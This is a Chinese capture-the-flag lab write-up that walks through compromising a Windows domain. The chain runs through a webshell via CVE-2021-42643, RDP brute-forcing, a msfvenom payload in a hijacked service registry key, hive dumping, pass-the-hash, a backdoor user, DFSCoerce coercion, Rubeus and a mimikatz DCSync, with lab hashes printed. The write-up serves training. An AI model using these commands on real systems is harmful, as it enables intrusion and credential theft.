Delegation-春秋云镜

攻防渗透
, ,

外网打点

利用 cve-2021-42643,直接访问路由/admin admin 123456登入后台

找到模版选项

可以直接进行命令执行,直接写一个一句话shell进去

蚁剑连接成功。

提权

suid 提权看一下

find / -user root -perm -4000 -print 2>/dev/null

有diff可以用这个来查看文件

内网渗透

可以看到有一个提示是windows的域用户,我们传一个fscan扫描一下内网
扫描记录如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.45:135 open
172.22.4.7:139 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7	(Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.36        code:200 len:68069  title:中文网页标题
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

根据前面flag的提示可以扫描一下win19这台机器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
172.22.4.45:80 open
172.22.4.45:445 open
172.22.4.45:139 open
172.22.4.45:135 open
172.22.4.45:515 open
172.22.4.45:3389 open
172.22.4.45:15774 open
172.22.4.45:47001 open
172.22.4.45:49664 open
172.22.4.45:49665 open
172.22.4.45:49667 open
172.22.4.45:49666 open
172.22.4.45:49668 open
172.22.4.45:49669 open
172.22.4.45:49671 open
172.22.4.45:49675 open
172.22.4.45:49676 open
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] WebTitle http://       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.4.45:47001  code:404 len:315    title:Not Found

发现开启了3389端口,那么我们去爆破一下密码。

1
2
3
proxychains4 hydra -l win19\Adrian -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

但是这两个我试了都他妈的报错不知道为啥。然后看了大佬的博客用了下密码
babygirl1

注册表提权

然后使用 rdesktop 登录上去会提示更改密码这里要提一个远程更改密码
登录上来之后桌面有一个文件夹是PrivescCheck扫描之后的结果,看一下html即可发现存在注册表提权。

用msfvenom生成一个木马

1
msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\sam.bat ' --platform windows -f exe-service > a.exe

还要在写一个sam.bat文件 

1
2
3
reg save hklm\system C:\Users\Adrian\Desktop\system 
reg save hklm\sam C:\Users\Adrian\Desktop\sam 
reg save hklm\security C:\Users\Adrian\Desktop\security

修改注册表

1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\a.exe" /f

然后在cmd中运行 

1
sc start gupdate

此时桌面就会出现三个文件然后拖到kali中解密一下

1
proxychains rdesktop 172.22.4.45 -r disk:test=/root/

这样在远程连接的时候会共享kali的文件夹所以可以直接将目标服务器的文件拖出来,来解密这三个文件

1
ptyhon3 secretsdump.py LOCAL -system system -sam sam -security security

得到账户的hash

1
2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:6b920c07d2b28ccb47de38f0a8edcb90

使用admin账户的hash打一下pth拿下第二个flag

1
2
3
proxychains python3 psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

type C:\Users\Administrator\flag\flag02.txt

添加个后门用户方便后续操作

然后我们利用机器账户的hash去收集下域内的信息

1
proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:6b920c07d2b28ccb47de38f0a8edcb90" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

非约束委派 + NtmlRelay 强制认证

导入bloodhound看一下可以利用的东西可以看到有非约束委派

参考红队域渗透NTLM Relay:强制认证方式总结,用DFSCoerce拿域控

ntmlrelay攻击原理:
https://qingwan.top/2024/01/23/ntlm%20relay/
https://www.geekby.site/2021/09/ntlm-relay/#3-%E5%AE%9E%E6%88%98

先用Rubeus.exe监听

1
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

然后使用dfscoerce强制访问获得域控的tgt导入lass

1
proxychains python3 dfscoerce.py -u win19$ -hashes "aad3b435b51404eeaad3b435b51404ee:6b920c07d2b28ccb47de38f0a8edcb90" -d xiaorang.lab win19 172.22.4.7

获得base64加密的tgt然后本地解密保存问kirbi,然后传一个mimikatz 上去导入进去

1
mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

获取到hash然后打pth 4889f6553239ace1f7c47fa2c619c252

1
proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19

在横到另一台机器上去